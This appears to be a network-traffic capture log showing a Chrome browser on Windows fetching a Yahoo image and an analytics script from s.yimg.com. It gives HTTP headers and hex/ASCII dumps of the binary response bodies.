                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 47 3f ac da c7 d9 71 fe 63 87 25 03 4b 26 97 52 a5 67 c8 ab 79 bd 0c 55 63 24 25 f6 08 f1 27 d4 7e 92 4f 43 f9 ed 87 20 1b dd 6d 4c b8 a6 9d 6c a5 49 e9 87 26 30 f2 52 15 d3 0e 00 d0 c8 eb 80 02 cb 62 d8 00 47 32 30 71 1a 01 e7 d6 d8 18 f4 88 26 6d ca 88 9e c2 80 6c 12 90 76 c4 0c 74 8c 5c 3c cd b3 32 4e 62 89 48 a9 ba b1 12 44 80 82 48 f0 a6 fb 5c fb b5 61 50 c6 5d 2f 04 fb 4b c7 4e fd e2 bf 1b 7e 58 95 02 50 00 75 c2 8e ec 0a 2f f1 8f 7f 8b f9 e0 18 c2 6a 84 a6 1c 85 01 c9 95 fe 07 00 a8 36 51 bc 57 07 a5 f0 da 87 21 2c 55 ff 00 04 79 1a 79 12 ab fb c1 18 8a a4 21 9d b8 93 9c 2b 54 2a ec b6 58 c8 35 0a a2 64 a0 7f 0a 8e d6 ad 28 02 db a2 e9 2a f8 5b 18 f9 28 d8 c5 c8 69 15 70 e2 a5 49 a9 2a f9 43 29 66 74 77 4a 29 48 34 37 54 17 e7 70 3e 1f 6e 28 b4 cb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: G?qc%K&RgyUc$%'~OC mLlI&0RbG20q&mlvt\<2NbHDH\aP]/KN~XPu/j6QW!,Uyy!+T*X5d(*[(ipI*C)ftwJ)H47Tp>n(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: fb 0b 1e 2f 87 5c 1d 3a fb 83 c4 2f 7a 0c f3 3b 2f 67 59 2e 6b 5f 11 dd 1e 41 2c 34 2d fe 6c 1d 3a fb 86 78 85 e5 dd 12 2e 1b 70 af 36 f0 f7 33 22 28 ad 2e ad 1d d7 02 f4 2d 0d a1 4d 91 7b a8 14 9d c5 8d ac 79 79 e2 ee 2d 98 f3 2b 65 e4 3b ea 59 ae 21 0b 34 d2 bc d9 41 c6 89 4a 06 cc ea 85 fc 82 bd 22 ff 00 3c cd ff 00 ca a7 12 21 ac 77 71 36 23 7c 3d 11 b0 c2 8b ba 2e 3e a0 c2 88 79 2c f5 52 7e fc 00 14 fb 64 69 c0 03 80 64 6d 80 03 43 00 01 b6 1a 07 14 d6 e0 0c 02 a6 09 31 c9 18 54 3e 76 3a 1a 37 b0 e7 89 38 46 31 15 66 a6 ba 60 f6 38 2d a5 c9 ea 1e 20 7e 8b 09 fd 25 1f cb 11 b1 08 e4 85 9a 53 45 41 2b 95 2d fb 9d 29 dd 4b 3d 4f b8 5f fd 36 c3 40 f5 22 80 fa df 15 5a a1 ef 5f 73 7d f6 03 d0 61 40 7e 4b 36 e6 70 0b 21 81 ab 9d c6 15 08 79 4c 0b 6d b6 1d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /\:/z;/gY.k_A,4-l:x.p63"(.-M{yy-+e;Y!4AJ"<!wq6#|=.>y,R~didmC1T>v:78F1f`8- ~%SEA+-)K=O_6@"Z_s}a@~K6p!yLm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 22 a7 21 87 2a 0a e2 83 db 3f b3 45 67 33 c7 67 2b 53 b3 dc 39 b5 15 86 94 d2 61 30 eb 6f 2c de ca 52 52 f2 ae 47 98 3e fd b1 2a c8 85 2c 15 33 b2 26 cf 71 c7 2f c0 9e dd 6a 8d 48 cc cc 4d 46 ca 4f c9 0e a9 0f a3 aa 16 13 7b 83 eb f0 df 71 03 d4 ac f9 b2 d7 86 df 7b c1 64 53 fb 4b f0 c6 b5 0d 91 50 8f 99 60 c9 5a 7c 68 56 5b a8 3a 10 bf 2d 4d b2 a0 41 e6 0f 97 3c 0b 53 b0 be a0 7a 66 44 7c 23 bd 0b 3d e5 0c d6 e1 8d 43 ac 07 64 86 4c 8f 67 7d 87 63 3d dd 85 69 2b ee dd 4a 57 a4 1d 8a b4 da fb 75 18 b2 b2 ec e4 3d 8a ef 16 bc 7f 9a 3b 94 e2 c7 91 13 39 a7 d7 0c 10 2e 4a 7e 68 ef 87 a0 09 88 80 23 ed fe f8 bf d6 38 51 24 1a d1 7b 6f 80 68 28 49 d9 e3 7f ae 3f 51 38 00 2a ae 9b c0 7c 1d d2 50 6e 3c f0 30 0a 96 7f 83 04 81 6b 0f c7 11 b1 46 d9 52 50 18 54 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "!*?Eg3g+S9a0o,RRG>*,3&q/jHMFO{q{dSKP`Z|hV[:-MA<SzfD|#=CdLg}c=i+JWu=;9.J~h#8Q${oh(I?Q8*|Pn<0kFRPTb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: d1 6b 0f 2e 78 e7 33 91 af 8b e4 43 67 e5 19 b1 96 e3 d4 c9 b2 a0 a9 49 29 50 61 c2 84 28 7a a4 6d e7 f6 e3 15 9a 5c 23 0b fc 28 9b 3a 51 72 45 45 73 1f 1c 93 25 f5 b8 d9 41 f3 ba b6 bd be ec 04 6d 0a 29 d9 3a 90 ad 6d 54 28 90 75 34 52 7c 2d 85 8d 3b dc 82 ab 93 d3 00 e4 38 d3 6a f4 ba 6d 44 b1 1f b9 4a 14 2c b4 b6 da 1b 59 df 62 52 2c 36 df 97 99 c3 a9 24 26 48 6d 0e a0 38 da f5 25 42 e0 8c 2c 0c 33 ed 33 3b 3c b4 2d 32 f3 0c c8 8e 36 ad 0b 8d 53 86 82 e2 0f 90 58 20 13 e9 a8 e1 ce 4b d4 a1 63 7c 57 a5 d3 d6 19 a9 4c 8b 21 07 e9 aa 33 81 0b 3f e2 a4 ac 1f ec 9c 36 47 c4 12 3a 4d 6b 87 b9 a1 c6 e4 31 9a 28 2b 4a c6 c9 71 d4 38 f9 bf 30 54 a3 a8 11 e5 b0 df 08 aa 63 5d 03 84 f4 53 d8 75 34 fa 16 51 6a b4 f2 52 16 a5 22 43 6d b6 da 4f e9 28 dc 83 e8 01 e5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k.x3CgI)Pa(zm\#(:QrEEs%Am):mT(u4R|-;8jmDJ,YbR,6$&Hm8%B,33;<-26SX Kc|WL!3?6G:Mk1(+Jq80Tc]Su4QjR"CmO(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: ae 1d f1 2a 6b a8 99 0a a7 40 0b 03 57 78 dc 17 d3 7b 13 cc 6b c4 4f 07 f3 11 3c a7 f6 95 ee 6d ca bc 66 a1 c9 32 a0 d1 e8 13 d7 a5 5f 37 dd be df 51 d7 7f 3c 1d 17 a5 42 75 4d fd 24 41 9c e3 da 55 29 2d b9 91 19 68 b6 a2 90 86 8e a4 00 3c 8d b0 de 96 e7 a8 ee a1 fa 16 44 d5 70 fa a8 c8 76 aa e5 16 54 57 14 13 a6 49 69 c0 2f d4 5c 6c 71 07 04 9a 7d 42 10 b3 90 b8 52 42 e4 42 a3 d0 d6 97 86 ab 86 db 04 7b 8e 0e 9e 44 ea 10 ad 3c 38 e1 5d 55 0d a7 e4 fa 24 d4 b7 72 b5 a9 86 92 48 3d 76 f7 60 78 cc 3a 84 3e 52 23 65 2c ba d0 a3 d3 23 c3 82 12 4f 72 db 3a 52 80 7c 80 1b 1f 79 c4 4a c3 4c 5e a5 0f f1 aa 2d 29 61 d2 90 10 9b f8 94 7c 4a f7 e1 ea 88 17 9e 9a d8 0b d5 59 f3 da bc 24 e9 60 f2 d0 2c 4e 1d 30 43 dc 55 94 9f 91 12 bf 12 a9 57 6f 42 18 d7 a9 7a af 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: *k@Wx{kO<mf2_7Q<BuM$AU)-h<DpvTWIi/\lq}BRBB{D<8]U$rH=v`x:>R#e,#Or:R|yJL^-)a|JY$`,N0CUWoBz{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 6c b6 bc b0 1c d2 0f 3a 71 3f 89 c2 75 36 43 c3 af 0b a2 42 ec d4 e1 2b 6b 28 32 8b 80 4d e9 fd 3a 9f 86 0e a6 c8 78 75 e1 2e 73 77 82 74 9c 93 59 ab e5 8c b5 4e f9 46 9f 01 f9 71 d3 22 98 54 da 9c 6d 05 49 49 48 20 90 48 b6 c4 5a f8 1e 4d 9f 20 f0 eb c6 6a cd 5d a3 f3 67 0e a3 35 56 ac f0 cb 28 43 0e 92 86 7d 9e 3a 9c 5b 8a 16 db c2 f8 29 e7 cc 8c 50 f7 97 de c5 94 ad 63 83 47 6b 7e 23 ce 6d 97 23 d1 61 30 5c 4e a4 a5 ba 4c a5 9f c1 60 7d a7 0d 78 f7 49 95 fb 6c 7e a1 71 af 8e 19 8d 33 9e 13 b2 dc 55 42 9a fc 25 a5 6a 6b e9 34 b2 92 7c 29 bd 8d af cb 91 18 ad 53 74 92 d0 f8 87 05 e7 6e 36 cd 8c af f6 73 44 67 d5 a4 d9 5f d6 ee 6f f7 e1 9c 44 ad 09 c5 5f 89 f2 53 69 5c 51 94 da 91 d2 33 ae a3 9f e8 ec 91 d3 0e 6f 61 95 52 83 3b cc d8 4e 97 78 9f 99 dc 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: l:q?u6CB+k(2M:xu.swtYNFq"TmIIH HZM j]g5V(C}:[)PcGk~#m#a0\NL`}xIl~q3UB%jk4|)Stn6sDg_oD_Si\Q3oaR;NxA


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              52192.168.2.45107187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC763OUTGET /uu/api/res/1.2/9DG6AgnOJ2KdSpjKQ9t4uw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/21b5e300-8579-11ef-beaf-01118c908edd.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1087INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="21b5e300-8579-11ef-beaf-01118c908edd.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "1f71cfe00839cdd1962827e846d89935"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 13:28:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Request-Id: 3eb990e2c2d927cd6cc33399c9d8c55d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 14:29:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T14:29:28.027Z;desc=hit,rtt;dur=85,content-info;desc="width=356,height=180,bytes=7748,owidth=3671,oheight=2068,obytes=720206,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 17050
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 3eb990e2c2d927cd6cc33399c9d8c55d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 52 49 46 46 3c 1e 00 00 57 45 42 50 56 50 38 20 30 1e 00 00 30 94 00 9d 01 2a 64 01 b4 00 3e 79 36 97 49 24 a2 a2 a2 26 11 4b d8 90 0f 09 65 00 cd b8 ee 2b a7 b3 62 cb 44 8f 03 7f 13 cb 57 e3 bb d7 7a 5b dc 61 fd a3 a2 67 4e 7a 56 8f c5 7f df 78 7f e7 97 e4 fe eb 7c 5f 60 ce d3 3e e1 24 af 98 6f 3d ff d4 f5 1a fc a7 f9 e7 fb 5f b6 ef 8e 39 0e af 3b ee bf af fe bd b3 da c8 0f 86 aa 80 1e 32 7a 5e 7a ef d8 3f f9 e7 f7 ef 4d 5f 68 4c e1 f4 ef d3 b0 14 b5 bc 6b ee 9c 9e be 5b 4f 23 7c 8d f2 59 49 aa d3 de 9d e7 4e fc c4 6f ea dd c4 99 79 b5 1b 59 ad f7 56 ac 7f cd 14 ca 64 eb 9a 46 a0 77 25 33 85 51 d3 2a 74 a5 31 b9 9c 3c 98 a3 f7 1a ab b8 34 e5 6b c1 1b 10 4c e8 b3 cf 62 3e 44 75 33 36 01 67 15 6b 56 b9 14 f9 ab d5 f1 46 3d a4 c1 86 94 1c af 94 7f e3 8e 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF<WEBPVP8 00*d>y6I$&Ke+bDWz[agNzVx|_`>$o=_9;2z^z?M_hLk[O#|YINoyYVdFw%3Q*t1<4kLb>Du36gkVF=L
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: cf fa 03 44 03 1a 28 e7 31 27 61 38 af c9 c3 e8 88 1d 8c 00 00 05 74 02 48 39 1e b5 3f 90 c3 82 e5 cb 23 46 b6 d3 91 0d d1 5d 0c f6 1d 75 5f 6b db 9d c2 e6 51 84 61 9f 72 7c 5e 43 74 4c 67 e1 26 05 4a e9 9e b3 5d 86 96 5d 53 7c 8a 79 6c 2d 35 1d f8 1c 35 8e eb bc 0f d8 30 60 3c 1b d1 c8 49 e3 23 31 c2 b3 2c 84 76 58 ed dc a8 d0 53 4c 80 35 be 13 31 d4 ac 93 05 ab 91 8f 77 5b 1c 38 81 56 1a 71 05 d4 9d d7 38 9f 95 fa 0d 0c e3 6b 73 bc dd ec f3 be eb 6e 60 5c a1 36 70 16 d8 99 16 f8 ea cf 1f 0e 90 f4 a7 52 5f 16 87 60 60 24 9b f0 0e 42 12 05 8b 01 12 9c ba af 3d 1b 8b b6 eb 1a 4f 88 0a 52 49 90 5b f4 90 70 d4 07 2e f7 a0 26 d5 25 fa ff 74 58 64 d7 90 d5 6a 64 47 23 20 99 f4 6a 72 71 71 84 d4 61 f0 94 62 d9 20 bf fc 69 97 87 b5 61 50 5b 95 b6 a1 92 ed 00 04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: D(1'a8tH9?#F]u_kQar|^CtLg&J]]S|yl-550`<I#1,vXSL51w[8Vq8ksn`\6pR_``$B=ORI[p.&%tXdjdG# jrqqab iaP[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: a8 36 3d 46 cb d3 6f 50 08 19 78 55 1e 24 f0 db 57 54 56 70 be 1e ec b8 8c ed b3 c2 f4 89 ab 63 98 20 5b e0 25 7f e7 87 2b c6 22 26 13 2d 63 35 9e 9b 7a 5d 05 02 77 ee b6 43 9e 55 11 fa 40 ca c7 03 a5 11 e5 55 3e 9d 86 e9 3c 32 54 97 b6 c5 38 fc 8f 60 f6 bf 58 a2 fe 33 4a 00 6c 57 ef 2f ed 4d 57 1c 7c 42 49 a8 87 27 8c b6 57 f0 77 9e 38 19 70 29 9d 4c 6c c4 0a 7a 69 85 bd 9f 59 60 4c 29 1f 3e 91 9f 97 e5 32 e3 87 f0 fe de 02 fc b9 2d 27 ac e3 c2 9a c7 ce d4 7a 5f 51 04 e7 07 47 a0 67 d8 47 84 cd 4c 0a af 03 64 3b eb 5b 68 4c f5 4a 25 20 25 15 68 0d ad 3e fe ff ae 40 a4 94 d6 b1 a8 73 13 4f 5b b3 34 1d 2a 0d 18 7e de 30 4f e8 97 d5 15 af e3 3c 5d c3 39 8e 4d 4d a9 ae 5f 21 73 d1 c5 1a 0c 86 c6 98 68 e6 82 66 35 49 49 9c 95 eb bf 66 93 b3 00 e6 bc 6b 4a 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6=FoPxU$WTVpc [%+"&-c5z]wCU@U><2T8`X3JlW/MW|BI'Ww8p)LlziY`L)>2-'z_QGgGLd;[hLJ% %h>@sO[4*~0O<]9MM_!shf5IIfkJ|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 1d 07 ce 1b f4 81 b3 1c 41 95 7f c0 0b 10 3c c5 e3 ea e9 cf 1a 0d 72 af 3c f8 d4 44 4b 22 8f ce ba 5d 8b 9f 6b cc 84 ae e0 03 ff b7 b7 d2 cd d0 dd 86 be 8e 06 80 8c 57 56 90 ae e9 dc f6 49 d6 1d 9d 34 a6 cf f4 64 cf e8 06 36 29 2a 49 70 cc 14 1b 67 ff 05 42 b8 6c 23 e5 70 02 ec 8b 62 d5 a8 cb 1c 3b 46 75 36 4b 10 79 21 34 57 c9 35 4a b5 00 9b 0c c2 eb a8 cc 71 19 7f 23 63 46 61 8f 82 95 b6 ad 36 11 c9 d6 54 d3 68 88 d0 00 a0 40 2c 65 57 b0 de 1f 18 06 54 47 8d e4 8c 70 fd 0d a6 2e f9 b3 81 04 c3 c1 00 83 6d 78 3f d5 68 e9 df de 2a 54 65 c6 4e 67 7c 2e 50 b5 da 79 4d af e6 3c 50 40 e5 2d bc 56 e0 e9 b8 68 2e b8 08 52 4f 44 ed 3c b9 4d e3 4c 9d 80 f7 42 88 41 e7 e3 38 3c 8b 4f cf 04 c9 25 5c cc f9 d7 23 38 91 29 91 91 de 5a e9 19 c9 96 3f db d9 b2 e3 bd e0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: A<r<DK"]kWVI4d6)*IpgBl#pb;Fu6Ky!4W5Jq#cFa6Th@,eWTGp.mx?h*TeNg|.PyM<P@-Vh.ROD<MLBA8<O%\#8)Z?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 64 19 9f ab ca aa 67 a5 ca e7 01 d4 e0 b5 e7 c5 ac f9 10 6e e8 7b b8 5a 0b be 06 19 12 5d 30 81 5f 77 7a 6e 18 4b 58 63 3a 4b a9 2e 7d 23 c0 b7 07 38 65 9e 81 bd 30 54 ad 2f ec 25 87 d9 9b b3 70 2d d1 e1 75 cb 18 ce d7 81 b4 83 b8 b6 d3 dd b2 bc 13 6f 5b 67 24 06 c3 75 26 5f 81 b6 00 f3 fd 43 b2 96 86 f4 79 c4 3f 68 26 47 9a 33 f7 62 18 46 43 50 f9 3f 0b 6e 02 c7 b7 c7 e5 02 ce 05 0e 7b 75 43 39 c0 96 fa 7a c8 78 61 65 ca 7f 5f d0 4e a3 ff 7b 8c 1c 77 a3 d2 24 ec 1d 52 d2 4c 10 8d 85 10 77 88 83 3e f9 20 9f 5d bc 75 ae b2 a9 ff 66 48 64 db 1d 15 86 fa 94 ce 87 48 b8 52 cf 17 e8 c8 7d ae 83 ae 03 c5 82 57 7b b7 88 c8 d1 73 cb 8f 4a ca cf c0 61 a5 a5 14 c9 b5 a9 e8 44 2e 43 96 56 e3 45 c1 c1 90 35 58 e4 46 98 05 40 6e 81 16 d5 1a 2b 15 c4 a9 a0 64 16 e9 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dgn{Z]0_wznKXc:K.}#8e0T/%p-uo[g$u&_Cy?h&G3bFCP?n{uC9zxae_N{w$RLw> ]ufHdHR}W{sJaD.CVE5XF@n+d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1248INData Raw: 39 e3 81 30 53 f6 81 92 90 de 83 63 77 5d 48 1d 21 29 a0 f4 bb a1 d2 4e 1f 96 1b 16 12 db 73 5a 0f 57 16 d0 f0 d9 8b 8f e5 87 7a b6 93 86 4b 06 36 58 2c 3a fb d7 42 bd cf fe 02 07 f4 07 b3 b7 91 7f 5d ef 50 21 09 9a a5 e7 3f 8c de a8 a2 0a 2b a1 e1 3f c4 b4 53 54 d0 71 34 67 e9 9c 45 87 3e 5b 2b cd 28 70 18 50 32 48 da 64 ed bc c9 1a 3a e4 ae 1e 0d 8b a2 90 23 2f 99 5e 4a a8 46 7d b2 9f ee 7e 42 bc 88 ed 78 98 ac dc 3e a9 d0 a1 11 7b 0c a0 3f f1 d7 53 15 66 a1 b1 ca bc a7 aa bb 2d 51 8e 3e 8f d8 fc 64 6d a6 db 0b c2 c8 a1 8f 2f 6b 4f 29 ff 28 1c 72 03 4a 22 b5 d2 f0 b4 7f bb e2 7f 54 fe dd 59 f2 71 27 39 0d 7a 2c 9f 39 7d c4 96 71 39 b3 e5 ab 06 5d 9f 86 0b 95 91 42 d6 0a b2 50 fe e7 ac 8c 86 45 fc c9 3f 33 c7 c0 f6 af 4c a0 16 94 ae 11 77 d9 5a ee d1 b2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 90Scw]H!)NsZWzK6X,:B]P!?+?STq4gE>[+(pP2Hd:#/^JF}~Bx>{?Sf-Q>dm/kO)(rJ"TYq'9z,9}q9]BPE?3LwZ


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              53192.168.2.45107387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC529OUTGET /ss/analytics-3.54.3.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: W8I/ZTakpF4xocwMT73o2CJO59FXCrnnIknTg0lIyof687IcpIqEfACouziOz3rNV0ReoZYMj80=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 8PWC8AQ52H6QYB4V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 21:08:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 03 May 2024 16:05:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "af551b67310e4c8fc63e60101c77c97f"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: o3Y2FoKXiHcpVnUZzDPBetSL4nVZrNUK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 51086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 425125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
